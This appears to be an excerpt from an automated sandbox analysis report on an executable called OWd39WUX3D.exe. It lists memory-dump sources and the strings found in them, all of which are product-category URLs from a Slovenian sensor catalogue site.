              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/dodatki/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/elektronika/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/merilna-celica/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/merilni-pin/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/natezna-merilna-celica/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/obrocni-pretvorniki-sile/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/posebni-pretvorniki-sile/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/senzorji-nagiba/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/senzorji-sile-napetosti-kompresije/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/senzorji-tlacne-sile/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/upogibni-nosilci-strizni-nosilci/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/basic-temperaturna-tipala/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/basic-temperaturna-tipala/temperat
